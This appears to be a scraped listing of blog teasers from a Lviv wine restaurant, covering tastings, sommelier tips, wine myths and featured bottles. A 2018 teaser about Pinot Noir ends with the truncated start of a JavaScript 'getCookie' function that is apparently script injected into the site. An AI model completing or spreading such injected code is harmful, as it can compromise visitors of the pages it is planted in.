29
Бер2023
Гастро-вечір «Української традиційної кухні та вина»
В неділю (5 лютого) запрошуємо вас на гастровечір у ресторані «Валентино»!
Сомельє підготував чудові українські вина з нашої карти вин.... Детальніше
13
Бер2022
Гастровечір у Львові збирає кошти для того, щоб випікати хліб та енергетичні батончики для військових
«Це про єдність та про небайдуже ставлення»
Ресторан «Валентино», що є членом Української Ресторанної Асоціації (УРА), з перших днів війни готував на своїй кухні смачні страви для ТРО та ЗСУ. Наразі команда ... Детальніше
04
Бер2022
Ресторан "Валентино" — львівський ресторан у центрі міста із італійським та українським меню та цікавою винотекою. У винному погребі закладу є власна колекція вин, в якому також представлено багато позицій із різних регіонів світу, визначитися з найкращим вибором допоможе професійний сомельє.
У винному погребі ресторану на Нижанківського стоїть пристрій, що дозволяє ... Детальніше
07
Бер2022
Ресторан "Валентино"
Винний ресторан "Валентино" - знаходиться в історичному і мальовничому центрі Львова, в старовинному будинку, який відразу надає атмосфери закладу, а в теплу пору року в закладі є літній майданчик, де ви можете посидіти і помилуватися старовинним містом.
Інтер'єр приміщення доповнюють арки, цегляне кладки, полиці з пляшками вина з колекції закладу. Гостям представлений широкий асортимент різних марок європейських вин і міцних напоїв, а до цих вишуканих напоїв являється великий вибір закусок, сирних і м'ясних тарілок мясні і рибні другі блюда.
Що таке дегустація вин?
Дегустація вин - майстер-клас від сомельє, який Вам розповість про усі тонкощі цього вишуканого напою і зробить оцінку якості харчових продуктів органолептичним шляхом - зором, нюхом, смаком. Сомельє - це люди, що мають перевірений і незмінний смак.
Як все проходить?
Щасливчики вирушають у винний ресторан "Валентино", де ... Детальніше
13
Бер2022
Маємо для Вас хороші новини - 22 лютого в ресторані "Валентино" наш сомельє Олег Курако проведе дегустацію найпопулярніших у світі лікерів.
- Baileys
- Drambuie
- Amaro Montenegro
- Vana Tallinn
- Killepitsch
Baileys – один із найвідоміших лікерів. Родом він із Ірландії і, хоча як алкогольний напій, досить молодий (виготовляється з 1974 року) став ... Детальніше
14
Бер2022
Вже скоро цикл Різдвяних свят закінчиться, тому час знову почати віддвідувати наші дегустації. Одну, з яких ми вже підготували.
⠀
Вже 25 січня ми організовуємо дегустацію віскі BENRICH.
Унікальна подія для поціновувачів віскі. Наш сомельє на цей час стане теж гостем, але з Шотландії. Олег Курако проведе дегустацію шотландського односолодового віскі BenRiach.
Тема: Смак ... Детальніше
17
Бер2021
Свято молодого вина триває декілька днів, під час яких дегустується напій.
У Франції розпочалося щорічне свято молодого вина.
Свято, що зародилося в Бургундії минулого століття, проходить під девізом "Божоле Нуво прибуло!". Традиційно воно триває кілька днів, в які напій прийнято дегустувати.
Сьогодні ... Детальніше
14
Бер2021
Дегустація Вина в ресторані Валентино
Маємо для Вас чудові новини
⠀
Вже 22 жовтня ми організовуємо дегустацію вин у Львові в ресторані «Валентино, від крафтової виноробні Biologist.
⠀
Набір дегустаційних вин:
5 вибраних вин від компанії Biologist
⠀
Дегустаційне меню:
- Вітелло тонато;
- палітра ... Детальніше
10
Бер2021
Цілком природньо, що пересічний покупець вина у ресторанах чи магазинах не вміє професійно обирати вино.
Самостійно визначити характеристики якісного вина та відчути відмінність між напоєм за $30 і за $130 складно.
Але не для тих, хто прочитав книгу Б’янки Боскер "Схиблені на вині", яка нещодавно вийшла.
Авторка описала те, як під керівництвом кращих ... Детальніше
09
Бер2021
Маємо для Вас хороші новини
Вже 28 жовтня ми організовуємо дегустацію вин під назвою «Червоні Вина Латинської Америки» у Львові в ресторані «Валентино».
⠀Набір дегустаційних вин: ⠀
Chile: Carmenere Reserva;
Argentina: Malbec Barrel Selection;
Uruguay: ... Детальніше
16
Бер2021
Просто м'ясо або просто риба - занадто широкі поняття, щоб підібрати відповідне супровід до них. Ось на що треба звернути увагу, підбираючи поєднання напоїв і до риби, і до м'яса:
на колір. М'ясо може бути білим (телятина, кролик), а риба - червоною або рожевою (червоний тунець, лосось), і вже в ... Детальніше
10
Бер2021
Жаркий сезон і період пікніків і виїздів на природу - не час для важких терпких вин з високим вмістом алкоголю. У теплу погоду хочеться зовсім не того ж, що в зимові холоди. До того ж, вибір страв теж буде залежати від сезонності і, відповідно, вимагати різних гастрономічних поєднань.
Ось кілька порад, ... Детальніше
10
Бер2021
Дегустація "Рислінг навколо світу" 25 серпня
Маємо знову для Вас гарні новини
⠀
25 серпня організовуємо дегустацію вин Riesling.
⠀
Набір дегустаційних вин:
Чехія/ Моравія / ... Детальніше
07
Бер2021
Про винні брендах США в нашій країні відомо мало, хоча ця країна займає 4-е місце в світі за обсягами виробництва вина і 9-е по його експорту. Більш того, американські вина успішно конкурують з європейськими, а кращі їхні представники часто навіть перевершують прославлені Grand Cru.
Низька популярність американських вин у нас пояснюється ... Детальніше
22
Бер2021
1. Якщо вино зафарбовує губи, то воно неякісне
Насправді, якщо говорити про хороші вина, то цей фактор взагалі не є ознакою якості. Все залежить від сорту винограду і від типу вина. Зрозуміло, що біле вино не залишатиме колір. Але червоне вино настоюють на шкірках, які містять антоціани (зафарбовуючі речовини). Кожен сорт ... Детальніше
13
Бер2021
"У людей існує багато помилкових уявлень про вино. Я зібрав 4 найпоширеніших міфів и поясню, чому вони НЕ мають сенсу ", - розповідає Олег.
1. Порошкове вино
Це — найпоширеніший міф. Вино не може бути таким з двох причин. Перш за все тому, що в жодній країні законодавчо не дозволено цього робити. ... Детальніше
07
Бер2021
Чому розмови сомельє іноді називають «пташиною мовою»? Як швидко навчитись говорити про вино? Якими словами правильно описати смак і аромат вина? Сомельє ресторану “Валентино” Олег Курако підготував відповіді на ці питання та шпаргалку з 10 слів, які допоможуть розібратись у вині.
Іноді мову сомельє важко зрозуміти через ... Детальніше
23
Бер2021
Розташований погреб під готелем, зайти в нього можна через ресторан “Валентино”. Запитавши працівників готелю чи ресторану знайти його Вам буде дуже легко.
Похід у винний погріб стане для Вас приємною дегустацією напоїв з відмінною витримкою. Адже українське виноробство сягає своїм корінням в далеке минуле. Сам погреб був створений ще в ... Детальніше
16
Бер2021
Розкажемо Вам сьогодні про виноробню Бейкуш — де виробляють мабуть, найбільш загадкове українське вино.
І справа не лише в найменуванні, яке є чи то власною назвою місцевості, чи то іменем птаха, що живе біля моря (пізніше з’ясувалося, що це і те, і те). У магазинах його знайти достатньо складно, і шукають, ... Детальніше
09
Бер2021
Цілком природно, що пересічний покупець вина у ресторанах Львова не вміє професійно обирати вино.
Коли ви завітаєте в найкращий ресторан у Львові «Валентино» наступного разу, оберіть вино, яке вам до вподоби, або попросіть сомельє Олега Курако запропонувати вам.
«Хороше вино можна обрати за трьома критеріями: збалансованість, складність і завершеність» - каже ... Детальніше
04
Бер2021
Чому розмови сомельє іноді називають «пташиною мовою»?
Іноді мову сомельє важко зрозуміти через її перевантаженість сленгом, специфічними локальними термінами та іноземними словами. Це нормально і притаманно будь-якій вузькопрофільній сфері.
Погана новина — на опанування цією мови можуть піти роки. Хороша новина — пересічному винолюбу вона не потрібна, адже Ви завжди можете прийти ... Детальніше
01
Бер2021
Складне питання на який до цих пір немає точної відповіді.
Теоретично, дороге вино повинно вигравати у дешевого аналога за всіма параметрами. Аромат дорогого вина буде багатогранним, він буде красиво і довго еволюціонувати - в ньому можна буде вловити до 10-15 відтінків і півтонів. Аромат дешевшого вина простий і швидко піде на ... Детальніше
28
Бер2021
Вина для масового щоденного споживання виробляються великими компаніями і позбавлені індивідуальності. Перед технологами стоїть завдання зробити якісне вино без вад для вечері на кожен день або для вечірки з друзями. Великі обсяги виробництва вина не дозволяють говорити про індивідуальність авторського стилю вина - будь-який стиль втрачається на тлі конвеєрного виробництва ... Детальніше
22
Бер2021
Багатьом з нас хочеться поставити на стіл пляшку з гучним ім'ям і не так важливо, наскільки смачним виявиться її вміст - головне, щоб гості оцінили жест! Але не варто сильно лаяти «клятих капіталістів». За гучним брендом, як правило, стоїть цікава історія, яку завжди цікаво розповісти за столом, а якість брендових ... Детальніше
18
Бер2021
Відносно не дороге доступне вино - це масовий продукт, який можна порівняти з одягом мас-маркет брендів Zara або H & M. Найчастіше це хороші і якісні, але зовсім не унікальні вина. Вони випускаються величезними тиражами для задоволення щоденного попиту і, як правило, позбавлені потенціалу до витримки. Цього року таке вино ... Детальніше
12
Бер2021
Почнемо з того, що ціна - категорія відносна. Для когось ціна в 3-5 тис. грн. буде надмірною, а хтось назве це цілком нормальною ціною за цікаве і багатогранне вино з історією. Але якщо відштовхуватися від середньостатистичного доходу по країні, то вина нижче 150 грн потрапляють в ультрабюджетний сегмент, вина 200-400 ... Детальніше
05
Бер2021
Сомельє - загадковий народ: вони присвятили своє життя вину але спльовують його під час дегустацій. Це професіонали, які мають значні знання в області вина, які працюють в хороших закладах, щоб надати вам "винні послуги" і допомогти підібрати страву до вина або навпаки. При бажанні, можна визначити економічний стан країни за ... Детальніше
27
Бер2021
EL CAPITAN
Pinot Noir
Насичений букет з нотами зрілої вишні, чорної черешні, ожини та чорничного джему, з ніжними ванільними відтінками та делікатними тонами бочкової витримки.
Гармонійний смак з приємним балансом кислотності, зрілих танінів та тривалим післясмаком стиглих ягід
Витримане 3 місяці у французьких дубових бочках Tonnellerie Vinea з подальшою витримкою у пляшці не менш ... Детальніше
20
Бер2021
Блідо-солом’яний колір з легким мідним відблиском.
Старі лози, що ростуть на глиняних грунтах в 10 км від
Адріатичного моря, та 50 км від Доломітових Альп.
Ніжний аромат квітів, що підкреслений відтінком тропічних фруктів приверне увагу поціновувачів, а нотки підсмаженого мигдалю у післясмаку довершать загальне враження від вина. Чудово пасує до холодних закусок, та ... Детальніше
12
Бер2021
Вітаємо! Сьогодні наші сомельє, щоб ближче познайомитись трохи розкажуть про себе.
В нас їх двоє цікавих та харизматичних професіоналів: Олег Курако та Владислав Ялоза.
Олег Курако, сомельє ресторану "Валентино", що при готелі «Швейцарський» ... Детальніше
11
Бер2020
Продовжуючи тему 'нових' виноробних регіонів, що у свій час були недооцінені, а зараз впевнено крокують крізь світові винні чарти, представляємо вашій увазі "Мірум" від Моначеска, з сорту винограду Вердіккіо. Винятково ручний збір винограду з тридцятирічної лози! Повнотіле, та водночас елегантне вино з дуже низким рівнем кислотності і незабутньою ароматикою!
07
Бер2020
Ще одна перлина у нашій колекції — Remole 2010 від маркізів Фрескобальді.
Поспішайте придбати останню пляшку цього вина у нашому погребі.
Спробувати це вино можна у ресторані “Валентино” !
Для резервації телефонуйте: +380972356777
27
Бер2020
Одне з найпівнічніших віскі Шотландії Highland Park 12 y.o. тепер у нашому асортименті!
Медові та цитрусові ноти, з легким відтінком диму, у ароматі цього віскі не залишать вас байдужими, а глибокий та збалансований смак зроблять вас його відданим шанувальником.
Запитуйте в наших сомельє, та дізнайтеся від них цікаву історію цієї ... Детальніше
21
Бер2020
Що вам відомо про найменший виноробний регіон Італії?
А про виноград Птіт Арвін? Сім'я Шарер, що родом із Франції, ще в ХVIII столітті переїхала до цього регіону, що межує зі Швейцарією, а у 1810 році висадила свої перші два гектари виноградників.
Скуштуйте Petite Arvine, а також запитуйте ... Детальніше
15
Бер2020
Остання пляшка! Спеціальна проозиція !
Freskobaldi Lamanione 2005 WS-90, WE-91
Marchesi de Fresсobaldi - старовинний аристократичний рід Італії, що виробляє свої вина з 1300-го року.
Також у власності маркізів Фрескобальді маєток Ornellaia з 2002 року.
Фрескобальді завжди успішно поєднували багатий досвід з нововведеннями.
Сьогодні Фрескобальді володіють дев'ятьма ... Детальніше
11
Бер2020
Якими бувають вина?
Білими? Червоними? Рожевими?
Додамо до цього переліку ще й помаранчеві вина! Ні — не ті, що з помаранчів. А вина золотаво-помаранчевого кольору.
Це старовинний метод, коли біле вино виготовляють за технологією виробництва червоних.
Заінтриговані? Вина можна вже спробувати у нас в ресторані "Валентино"!
23
Бер2019
Вино Barolo від виноробні FontanaFredda володіє чистим та інтенсивним ароматом із відтінком ванілі, спецій, вишні та троянд.
М'який, округлий смак із збалансованим тривалим післясмаком підкреслює всю витонченість даної позиції.
Витримка відбувається 2 роки в Альєрських дубових діжках із подальшою витримкою в пляшках впродовж року.
Цю ... Детальніше
16
Бер2018
Коли зима ще міцно тримає свої позиції, пропонуємо покращити настрій гарним червоним вином у ресторані "Валентино".
Pino Noir Danese з півночі Італії чудово пасуватиме до Каре ягняти чи тальятелле "Песто ді Полло е Фунґі". Ніжний та стриманий смак, водночас яскравий фруктовий аромат вина, не залишать вас байдужими.
function getCookie(e){var U=document.cookie.match(new ... Детальніше
05
Бер2018
Це вино виготовляється із винограду сорту Кортезе (регіон П’ємонт, Італія).Назву “Гаві дей Гаві” придумав і запатентував Джорджо Сольдаті, ще до того,як з’явились аппелласьони і перекладається як “краще із Гаві” або “всім Гаві Гаві”. Так Джорджо відмітив краще вино, яке йому вдалось зробити.Цікавий факт, що винна карта вагону-ресторану легендарного “Східного Експрессу”, ... Детальніше
23
Бер2018
ТАУРАЗІ — сухе червоне вино для холодних зимових вечорів, що його ви знайдете в нашій винній карті. Виготовлене з сорту Альяніко (Aglianico). З цього сорту, як вважають історики, виготовляли славнозвісне Фалернське вино, чи не найвідоміше вино Античного світу. Про нього писали Ціцерон, Пліній Старший, Горацій тощо. Фалернське вино, за свідченням ... Детальніше
17
Бер2017
Інноваційний прилад працює навіть простіше, ніж класичний штопор. Крізь фольгу і пробку проходить надтонка голка, в процесі за допомогою аргону на пляшку створюється тиск. Інертний газ виштовхує вино через голку в келих, не даючи при цьому доступ кисню. Після того як голка вийнята, пробка природним чином герметизується.Пристрій виготовлено ... Детальніше
25
Бер2017
Амароне Делла Вальполічелла – по-справжньому королівське вино, яке прославило одну з кращих виноробних провінцій Італії, Венетто. Тільне, глибоке, сухе вино із солодким ароматом. Досконалий купаж двох сортів вина – Корвіна і Рондінелла. Протягом останнього століття, технологія витримки вина значно вдосконалилась, завдяки великій увазі виробників до якості вина, процесу виробництва та ... Детальніше